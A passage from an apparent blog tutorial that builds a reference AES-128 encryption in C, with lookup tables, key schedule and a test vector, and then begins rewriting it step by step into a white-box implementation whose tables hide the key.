    { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
    { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
};

Once you have this magic table, the multiplication gets really easy. Let's take an example:

mixcolumn_example.png
As I said, the four bytes at the left are from your state & the 4x4 matrix is the fixed one (filled only with 3 different values). To have the result of this multiplication you just have to execute this:
reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])

The first indexes in the table are the actual values taken from the 4x4 matrix minus one (because our array is going to be addressed from index 0). So then you can declare your own 4x4 matrix with proper indexes & do the multiplication four times:

void MixColumns(unsigned char out[16])
{
    const unsigned char matrix[16] = {
        1, 2, 0, 0,
        0, 1, 2, 0,
        0, 0, 1, 2,
        2, 0, 0, 1
    },

    /// In[19]: reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])
    /// Out[19] : 4
    /// In [20]: reduce(operator.xor, [gmul[0][0xd4], gmul[1][0xbf], gmul[2][0x5d], gmul[0][0x30]])
    /// Out[20]: 102

    gmul[3][0x100] = {
        { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
        { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
        { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
    };

    for (size_t i = 0; i < 4; ++i)
    {
        unsigned char a = out[i * 4 + 0];
        unsigned char b = out[i * 4 + 1];
        unsigned char c = out[i * 4 + 2];
        unsigned char d = out[i * 4 + 3];

        out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
        out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
        out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
        out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];
    }
}

Combine them together

Now we have everything we need, it is going to be easy peasy ; really:

  1. The initial state is populated with the encryption key
  2. Generate the round-keys thanks to the key schedule ; remember 11 keys, the first one being the plain encryption key
  3. The first different round is a simple AddRoundKey operation
  4. Then we enter in the main loop which does 9 rounds:
    1. SubBytes
    2. ShiftRows
    3. MixColumns
    4. AddRoundKey
  5. Last round which is also a bit different:
    1. SubBytes
    2. ShiftRows
    3. AddRoundKey
  6. The state is now your encrypted block, yay!

Here we are, we finally have our AES128 encryption function that we will use as a reference:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }

    /// Dig in now
    /// The initial round is just AddRoundKey with the first one (being the encryption key)
    memcpy(out, in, 16);
    AddRoundKey(round_keys[0], out);

    /// Let's start the encryption process now
    for (size_t i = 1; i < 10; ++i)
    {
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
        AddRoundKey(round_keys[i], out);
    }

    /// Last round which is a bit different
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Not that bad right? And we can even prepare a function that tests if the encrypted block is valid or not (this is really going to be useful as soon as we start to tweak the implementation):

unsigned char tests()
{
    /// AES128ENC
    {
        unsigned char key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };
        unsigned char out[16] = { 0 };
        unsigned char plain[16] = { 0x32, 0x43, 0xf6, 0xa8, 0x88, 0x5a, 0x30, 0x8d, 0x31, 0x31, 0x98, 0xa2, 0xe0, 0x37, 0x07, 0x34 };
        unsigned char expected[16] = { 0x39, 0x25, 0x84, 0x1d, 0x02, 0xdc, 0x09, 0xfb, 0xdc, 0x11, 0x85, 0x97, 0x19, 0x6a, 0x0b, 0x32 };
        printf("> aes128_enc_base ..");
        aes128_enc_base(plain, out, key);
        if (memcmp(out, expected, 16) != 0)
        {
            printf("FAIL\n");
            return 0;
        }
        printf("OK\n");
    }

    return 1;
}

Brilliant.

White-boxing AES128 in ~7 steps

Introduction

I'm no crypto-expert whatsoever but I'll still try to explain what "white-boxing" AES means for us. Currently, we have a block encryption primitive with the following signature void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16]). One of the purpose of the white-boxing process is going to "remove", or I should say "hide" instead, the key. Your primitive will work without any input key parameter, but the key won't be hard-coded either in the body of the function. You'll be able to encrypt things without any apparent key.

A perfectly secure but unpractical version of a white-box AES would be to have a big hash-table: the keys would be every single possible plain-texts and the values would be their encrypted version with the key you want. That should give you a really clear idea of what a white-box is. But obviously storing that kind of table in memory is another problem by itself :-).

Instead of using that "naive" idea, researchers came up with way to pre-compute "things" that involve the round-keys in order to hide everything. The other goal of a real white-box is to be resistant to reverse-engineering & dynamic/static analysis. Even if you are able to read whatever memory you want, you still should not be able to extract the key. The NoSuchCon2013 crackme is again a really good example of that: we had to wait for 2 years before @doegox actually works his magic to extract the key.

The design of the implementation is really really important in order to make that key extraction process the most difficult.

In this part, we are using James A. Muir's paper to rewrite step by step our implementation in order to make it possible to combine several operations between them & make pre-computed table out of them. At the end of this part we should have a working AES128 encryption primitive that doesn't require an hard-coded key. But we will also build in parallel a tool used to generate the different tables our implementation is going to need: obviously, this tool is going to need both the key schedule & the encryption key to be able to generate the look-up tables. Long story short: the first steps are basically going to reorder / rewrite the logic of the encryption, & the last ones will really transform the implementation in a white-box.

Anyway, let's go folks!

Step 1: bring the first AddRoundKey in the loop & kick out the last one out of it

This one is really easy: basically we just have to change our loop to start at i=0 until i=8 (inclusive), move the first AddRoundKey in the loop, and move the last one outside of it.

The encryption loop should look like this now:

void aes128_enc_reorg_step1(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
    }

    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Step 2: SubBytes then ShiftRows equals ShiftRows then SubBytes

Yet another easy one: because SubBytes is just replacing a byte by its substitution (stored in S_box), you can apply ShiftRows before SubBytes or SubBytes before ShiftRows ; you will get the same result. So let's exchange them:

void aes128_enc_reorg_step2(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        ShiftRows(out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    AddRoundKey(round_keys[9], out);
    ShiftRows(out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 3: ShiftRows first, but needs to ShiftRows the round-key

This one is a bit more tricky, but again it's more about reordering, rewriting the encryption loop than really replacing computation by look-up tables so far. Basically, the idea of this step is to start the encryption loop with a ShiftRows operation. Because of the way this operation is defined, if you put it first you also need to apply ShiftRows to the current round key in order to get the same result than AddRoundKey/ShiftRows.

void aes128_enc_reorg_step3(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);
        ShiftRows(round_keys[i]);
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    ShiftRows(out);
    ShiftRows(round_keys[9]);
    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 4: White-boxing it like it's hot, White-boxing it like it's hot

This step is a really important one for us, it's actually the first one where we are going to be able to both remove the key & start the tables generator project. The tables generator project basically generates everything we need to have our white-box AES encryption working.

Now we don't need the key schedule anymore in the AES encryption function (but obviously we will need it on the table generator side), and we can keep only the encryption loop.

The transformation introduced in this step is to create a look-up table that will replace ShiftRows(round_keys[i])/AddRoundKey/SubBytes. We can clearly see now how our round keys are going to be "diffused" & combined with different operations to make them "not trivially" extractable (in fact they are, but let's say they are not right now). In order to have such a table, we need quite some space though: basically we need this table Tboxes[10][16][0x100]. We have 10 operations ShiftRows(round_keys[i])/AddRoundKey/SubBytes, 16 bytes of round keys in each one of them and the 0x100 for the bytes ([0x00-0xFF]) than can be encrypted.

The computation is not really hard:

  1. We compute the key schedule for a specific encryption key
  2. We populate the table this way:
    1. For each round key:
    2. For every byte possible:
      1. You compute S_box[byte ^ ShiftRows(roundkey)[i]]

The S_box part is for the SubBytes operation, the xor with one byte of the round key is for AddRoundKey & the rest is for ShiftRows(round_keys[i]). There is a special case for the 9th round key, where you have to include AddRoundKey of the latest round key. It's like we don't have 11 rounds anymore, but 10 now. As the 9th contains information about the round key 9th & 10th.

If you are confused about that bit, don't be ; it's just I suck at explaining things, but just have a look at the following code (especially at lines 47, 48):

int main()
{
    unsigned char key[16] = "0vercl0k@doare-e";
    unsigned char plain_block[16] = "whatdup folks???";
    unsigned char round_keys[11][16] = { 0 };

    /// 10 -> we have 10 rounds
    /// 16 -> we have 16 bytes of round keys
    /// 0x100 -> we have to be able to encrypt every plain-text input byte [0-0xff]
    unsigned char Tboxes[10][16][0x100] = { 0 };

    key_schedule(key, round_keys);

    /// Remember we have 10 rounds & we want to combine AddRoundKey & SubBytes
    /// which is really simple.
    /// These so-called T-boxes are defined as follows:
    /// Tri(x) = S[x ^ ShiftRows(rk)[i]] ; r being the round number ([0-8]), x being the byte of plaintext, rk the roundkey & i the index ([0-15])
    printf("#pragma once\n");
    printf("// Table for key='%.16s'\n", key);
    printf("const unsigned char Tboxes[10][16][0x100] = \n{\n");
    for (size_t r = 0; r < 10; ++r)
    {
        printf("  {\n");

        ShiftRows(round_keys[r]);

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                Tboxes[r][i][x] = S_box[x ^ round_keys[r][i]];
                /// We need to include the bytes from the roundkey 10 to replace that:
                ///  ShiftRows(out);
                ///  ShiftRows(round_keys[9]);
                ///  AddRoundKey(round_keys[9], out);
                ///  SubBytes(out);
                ///  AddRoundKey(round_keys[10], out);
                ///
                /// By
                /// ShiftRows(out);
                /// for (size_t j = 0; j < 16; ++j)
                ///     out[j] = Tboxes[9][j][out[j]];
                if (r == 9)
                    Tboxes[r][i][x] ^= round_keys[10][i];

                printf("0x%.2x", Tboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }
            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n\n");
}

Now that we have this table created, we just need to actually use it in our encryption. Thanks to this table, the encryption loop is way more simple and pretty, check it out:

void aes128_enc_wb_step1(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        MixColumns(out);
    }

    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 5: Transforming MixColumns in a look-up table

OK, so this is maybe the "most difficult" part of the game: we have to transform our ugly MixColumn function in four look-up tables. Basically, we want to transform this:

out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
